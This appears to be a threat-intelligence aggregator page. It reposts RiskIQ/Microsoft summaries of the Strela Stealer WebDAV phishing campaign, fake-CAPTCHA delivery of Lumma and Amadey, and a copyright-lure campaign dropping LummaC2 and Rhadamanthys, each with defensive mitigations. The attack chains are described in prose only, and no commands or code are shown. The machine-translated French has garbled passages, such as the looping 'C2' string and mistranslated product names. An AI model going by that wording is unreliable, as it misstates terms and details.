One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8603945 |
| Date de publication | 2024-10-30 22:28:21 (vue: 2024-10-30 23:07:27) |
| Titre | Strela Stealer cible le centre et le sud-ouest de l'Europe grâce à une exécution furtive via webdav Strela Stealer targets Central and Southwestern Europe through Stealthy Execution via WebDAV (Recyclage) |
| Texte | #### Targeted Geolocations - Spain - Germany ## Snapshot The latest Strela Stealer phishing campaign, identified by Cyble Research and Intelligence Labs, uses deceptive invoices to lure victims, mainly impacting Central and Southwestern Europe. ## Description These phishing emails contain ZIP files with obfuscated JavaScript files that, when opened, trigger a PowerShell command to download a malicious payload directly from a WebDAV (Web Distributed Authoring and Versioning) server. This method allows Strela Stealer to bypass detection by not saving files to disk. The malware\'s payload is embedded within a DLL file designed to extract email credentials and other sensitive details, specifically from Microsoft Outlook and Mozilla Thunderbird, which are then transmitted to the attackers\' command server. Strela Stealer tailors its activity to specific geographic areas, in this campaign mainly Germany and Spain, by checking locale settings on the infected system. Additionally, it collects system details and file directory data, which allows attackers to perform reconnaissance and possibly conduct follow-up attacks. The malware uses sophisticated evasion techniques, such as JavaScript obfuscation and base64 encoding, making it challenging for security tools to detect. Strela Stealer\'s evolution-from simple phishing with ISO attachments to complex fileless execution-highlights the ongoing advancements in malware distribution tactics, emphasizing the need for robust cybersecurity measures to address such sophisticated threats. ## Microsoft Analysis and Additional OSINT Context Threat actors use WebDAV for distributing information-stealing malware, such as Strela Stealer, because it offers several advantages for evasion, simplicity, and control over payload delivery: - Fileless Execution and Evasion: WebDAV enables fileless malware execution by running malicious payloads directly from remote servers without saving them locally on the target machine. This helps bypass many traditional security defenses that focus on scanning files on disk, as no local file is created. - Direct Remote Access: WebDAV is designed to allow clients to interact with remote servers as though they were local folders. This allows threat actors to distribute payloads seamlessly over HTTP/HTTPS, appearing as legitimate remote connections to the system, which reduces the chances of detection. - Efficient Data Transmission: WebDAV supports real-time access to resources over the network, making it efficient for both distribution and control. Attackers can change payloads or update malicious DLLs on their WebDAV server, ensuring that new or adapted versions of malware are available without having to reinfect machines. - Bypassing Firewalls and Security Filters: Many organizations allow outbound WebDAV traffic through HTTP or HTTPS. This allows attackers to communicate with compromised devices without raising alarms, as this traffic blends in with normal web traffic. - Modular and Scalable Attacks: By using WebDAV, threat actors can scale their operations, as they only need to update files on a centralized server to infect multiple systems, enhancing the malware\'s reach with minimal adjustments on the attacker\'s side. These qualities make WebDAV an attractive option for attackers seeking stealthy, flexible, and scalable methods to deliver information-stealing malware. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 t |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2024 2024** 365 365/security/defender 365/security/office about access access: accessed accounts acquired activity actors adapted additional additionally address adjustments advancements advantages advice: against age alarms all allow allows analysis antivirus any app appearing apps are areas article attachments attack attacker attackers attacks attacks: attractive authentication authenticator authoring auto available base64 based because behind blends block blocks both browser browsers bullet bypass bypassing campaign can card central centralized challenging chances change check checking classes click clicking clients cloud code collects com/azure/active com/blog/strela com/deployedge/microsoft com/en com/microsoft command common communicate complex components compromised conduct configure connections contain content context control copyright cover coverage created credential credentials criterion customers cybersecurity cyble data deceptive defender defenses delete deliver delivered delivery: deployment description designed details detect detection detections/hunting detects devices different direct directly directory directory/authentication/concept directory/authentication/how directory/identity disk distribute distributed distributing distribution distribution/ dll dlls download due edge efficient email emails embedded emmenhtal emphasizing employees enable enabled enables encoding encourage encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/web enforce enhanced enhancing ensure ensuring enterprise entire equivalent europe evasion evasion: even evolution evolving example excluded executable execution extract features fido file fileless files filtering filters: firewalls first flexible focus folders follow following from geographic geolocations germany group guidance hacktool:win32/autokms having hello helps highlights host hour http http/https https https://blog https://cyble https://learn https://www identified identifiesand identity impact impacting inbound including infect infected infections information infostealer infostealers infrastructure intelligence interact intrusions invoices io/webdav iso its javascript keys labs latest learndoc learndoc#block learning legitimate like links list loader local locale locally locations lure machine machines mail mainly majority make making malicious malware malware: managed many match measures meet method methods mfa microsoft minimal mitigation mitigations mode modular monitored more mozilla msr multiple name=hacktool:win32/autokms name=trojan:js/obfuse name=trojan:js/strelastealer name=trojan:win32/coinminer name=trojan:win32/killav name=trojan:win32/leonem name=trojan:win64/stealer name=trojandropper:js/obfus need network new newly normal not number obfuscated obfuscation ocid=magicti off offer offers office ongoing only opened operations option organizations osint other outbound outlook over overview part password passwordless passwords payload payloads perform permission personal phishing phones points policies policy polymorphic possible possibly potentially powershell prevalence prevent product prohibited prompt protection protection/howto protections pua purge qualities queries raising ransomware rapidly reach real recheck recommendations recommends reconnaissance reduce reduces reduction refer reference references reinfect remind remote remove reproduction require requires research reserved resources response rights robust rules running safe saving scalable scale scam scanning scripts seamlessly secured security security/defender security/safe security/zero seeking sekoia sensitive sent server servers service service: settings several should side sight simple simplicity site sites smartscreen snapshot sophisticated southwestern spain spam specific specifically spoofed status stealer stealing stealthily stealthy stop stored strela strictly succeeded such support supports surface sweeping sync#sync syncing system systems tactics tailors target targeted targets techniques theft them then thereof these though threat threats thro |
| Tags | Ransomware Spam Malware Tool Threat |
| Stories | |
| Move | 
|
Les reprises de l'article (1):
| Source | RiskIQ |
|---|---|
| Identifiant | 8603374 |
| Date de publication | 2024-10-29 16:30:09 (vue: 2024-10-29 17:07:18) |
| Titre | Lumma/Amadey: fake CAPTCHAs want to know if you\'re human (Recyclage) |
| Texte | ## Instantané Les cybercriminels continuent d'utiliser [Fake capchas] (https://security.microsoft.com/intel-explorer/articles/9c8e0b72) comme vecteur d'infection initial pour distribuer des logiciels malades.[Lumma Stealer] (https://security.microsoft.com/intel-profiles/3393357882548511C30B0728DDD3C4F8B5CA20E41C285A56F796EB39F57531ad) , plates-formes de paris, animeRessources et applications Web.Les chercheurs de sécurité ont également découvert Captchas livrant le Trojan Amadey. ## Description Le Captcha malveillant fait partie d'un réseau publicitaire qui a de réelles offres en plus des redirections menant à des pages avec le faux captcha.Le CAPTCHA informe les utilisateurs dans l'exécution d'une commande PowerShell codée de base64, qui conduit à un script PowerShell obscurci qui télécharge la charge utile malveillante.Le Lumma Stealer fonctionne en utilisant l'outil légitime BitlockerTogo.exe pour manipuler le registre et rechercher des fichiers associés aux portefeuilles de crypto-monnaie, les extensions de navigateur, les cookies et les archives du gestionnaire de mots de passe pour voler des données.Le Troie tente d'utiliser l'outil pour envoyer les données volées au serveur de l'attaquant \\.Ensuite, il visite divers magasins en ligne, éventuellement pour stimuler les vues pour générer des revenus pour ses opérateurs.De plus, la campagne distribue le Trojan Amadey, qui vole les informations d'identification des navigateurs Web et de divers systèmes de calcul de réseau virtuel (VNC), remplace les adresses de portefeuille Crypto dans le presse-papiers et, dans certains cas, prend des sachets et télécharge l'outil d'accès à distance RemcOAccès à l'appareil de la victime. Securelist rapporte que du 22 septembre au 14 octobre 2024, plus de 140 000 utilisateurs ont rencontré des publicités liées à cette campagne, et plus de 20 000 d'entre eux ont été redirigés vers des sites infectés.Les utilisateurs les plus touchés étaient au Brésil, en Espagne, en Italie et en Russie. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Vérifiez les paramètres de filtrage des e-mails Office 365 pour vous assurer de bloquer les e-mails, le spam et les e-mails avec des logiciels malveillants.Utilisez [Microsoft Defender pour Office 365] (https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-foro-office-365?ocid=Magicti_Ta_learnDoc) pour une protection et une couverture de phishing améliorées contrenouvelles menaces et variantes polymorphes.Configurez Microsoft Defender pour Office 365 à [Rechercher les liens sur Click] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) et [derete SenteMail] (https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=Magicti_ta_learndoc) en réponse à l'intelligence de menace nouvellement acquise.Allumez [les politiques de pièces jointes de sécurité] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-polies-configure?ocid=Magicti_TA_LearnDoc) pour vérifier les pièces jointes à l'e-mail entrant. - Encourager les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge [SmartScreen] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-overview?ocid=Magicti_TA_LearnDDoc), qui identifieet bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc)Dans Microsoft Defender Antivirus, ou l'équivalent de votre produit antivirus, pour couvrir les outils et techniques d'att |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | ### **© 000 140 2024 2024** 2147069186 2147078266 2147117932 365 365/security/defender 365/security/office about access accessed accounts acquired addition additionally addresses ads adult advice: affected against age all also amadey amadey/114312/ anime antivirus any app apps archives are article associated attachments attack attacker attempts authentication authenticator auto base64 based behind betting bitlockertogo block blocks boost brazil browser browsers bullet but campaign can captcha captcha: captchas card cases check classes clever click clicking clipboard cloud code com/azure/active com/deployedge/microsoft com/en com/fake com/intel com/microsoft command common computing configure content continue cookies copyright cover coverage cracked credential credentials criterion crypto cryptocurrency customers cybercriminals data defender delete delivered delivering delivers deployment description detections/hunting device devices different directory/authentication/concept directory/authentication/how directory/identity discovered distribute distributing distribution downloads due edge email emails employees enable enabled encoded encountered encourage encyclopedia endpoint/attack endpoint/configure endpoint/detect endpoint/web enforce enhanced ensure enterprise entire equivalent even evolving example excluded exe executable executing execution explorer/articles/9c8e0b72 extensions fake features fido file files filtering first following from full games gateway generate group grown guidance has hello host hosting hour https://learn https://securelist https://security https://www human identifies identity impact inbound include including infected infection infections infostealer infostealers initial intelligence intrusions italy its keys know leading leads learndoc learndoc#block learning legitimate like links list locations lumma lumma/amadey: machine mail majority malicious malware managed manager manipulate many match mbjg meet methods mfa microsoft mitigation mitigations mode monitored more most msr&threatid= mtb mtb&threatid= name=pws:win32/lumma name=trojan:win32/amadey name=trojan:win32/lummacstealer name=trojan:win32/lummastealer name=trojan:win64/lumma network new newly not number obfuscated ocid=magicti october off offer offers office online operates operators organizations other over overview pages part password passwordless passwords payload permission personal phishing phones platforms points policies policy polymorphic possible possibly potentially powershell prevalence prevent product profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad prohibited prompt protection protection/howto protections pua purge pws:win32/lumma queries ransomware rapidly real recheck recommendations recommends redirected redirects reduce reduction refer reference references registry related remcos remind remote remove reports reproduction require requires researchers reserved resources response revenue rights rules running russia safe scam screenshots script scripts search secured securelist security/defender security/safe security/zero securlist send sent september server services settings sharing should sight since site sites smartscreen snapshot some spain spam specific spoofed status steal stealer steals stolen stop stored stores strictly substitutes succeeded support surface sweeping sync#sync syncing systems takes techniques theft then thereof those threat threats through times tool tools tricks trojan trojan:win32/acll trojan:win32/amadey trojan:win32/lummacstealer trojan:win32/lummastealer trojan:win32/malgentera trojan:win64/lumma trusted turn typed unknown unless unwanted us/wdsi/threats/malware use used users uses using variants various vaults vector victim views virtual visits vnc wallet wallets want wasprimarily web websites when where which windows without workplace written you your “yes” |
| Tags | Ransomware Spam Malware Tool Threat |
| Stories | |
| Move |
|
L'article ressemble à 1 autre(s) article(s):
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
|
2024-11-01 16:56:15 | (Déjà vu) Les acteurs de la menace utilisent le leurre de phishing de violation du droit d'auteur pour déployer des infostèleurs Threat actors use copyright infringement phishing lure to deploy infostealers (lien direct) |
#### Géolocations ciblées - Taiwan ## Instantané Cisco Talos a récemment identifié une campagne de phishing ciblant les comptes commerciaux et publicitaires de Facebook à Taïwan. ## Description Cette campagne implique des e-mails se faisant passer pour des avis juridiques de sociétés bien connues, revendiquant une violation du droit d'auteur et exigeant des mesures dans les 24 heures.Les e-mails attirent les destinataires dans le téléchargement des logiciels malveillants déguisés en fichiers PDF.L'acteur de menace utilise plusieurs techniques pour échapper à la détection, notamment à abuser des domaines AppSpot.com de Google \\ et Dropbox pour la distribution de logiciels malveillants. Les e-mails de phishing utilisent la langue chinoise traditionnelle, avec des noms de fichiers conçus pour ressembler à des documents juridiques de sociétés reconnaissables, suggérant que l'attaquant a recherché à fond ses objectifs.Lorsque les victimes téléchargent le fichier RAR ci-joint, une archive protégée par mot de passe contient un voleur d'informations, généralement le malware Lummac2 ou Rhadamanthys, qui recueille des données sensibles, y compris les informations d'identification du système, et la transmet à la commande et au contrôle de l'attaquant \\ (C2 (C2 (C2 (C2 (C2 (C2 (C2 (C2 (C2 est de) serveurs. TALOS a observé que Lummac2 fonctionne en cryptant son shellcode, en cachant la charge utile dans la mémoire du système et en utilisant l'API CreateFileMappinga pour échapper à la détection.Rhadamanthys repose également sur l'obscurcissement et l'injection de processus, augmentant les tailles de fichiers pour contourner les analyses antivirus et s'intègre dans les processus système légitimes.Les deux chargeurs de logiciels malveillants manipulent les entrées de registre pour la persistance et utilisent des objets Mutex pour prévenir les infections en double.Cette campagne démontre l'évolution de la sophistication des attaques de phishing ciblant les comptes commerciaux et les méthodes utilisées pour contourner les mesures de sécurité traditionnelles. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Vérifiez les paramètres de filtrage des e-mails Office 365 pour vous assurer de bloquer les e-mails, le spam et les e-mails avec des logiciels malveillants.Utilisez [Microsoft Defender pour Office 365] (https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-foro-office-365?ocid=Magicti_Ta_learnDoc) pour une protection et une couverture de phishing améliorées contrenouvelles menaces et variantes polymorphes.Configurez Microsoft Defender pour Office 365 à [Rechercher les liens sur Click] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) et [derete SenteMail] (https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=Magicti_ta_learndoc) en réponse à l'intelligence de menace nouvellement acquise.Allumez [les politiques de pièces jointes de sécurité] (https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-polies-configure?ocid=Magicti_TA_LearnDoc) pour vérifier les pièces jointes à l'e-mail entrant. - Encouragez les utilisateurs à utiliser Microsoft Edge et d'autres navigateurs Web qui prennent en charge [SmartScreen] (https: //learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), qui identifie et bloque des sites Web malveillants, y compris des sites de phishing, des sites d'arnaque et des sites qui hébergent des logiciels malveillants. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc)Dan | Ransomware Spam Malware Tool Threat | ★★ |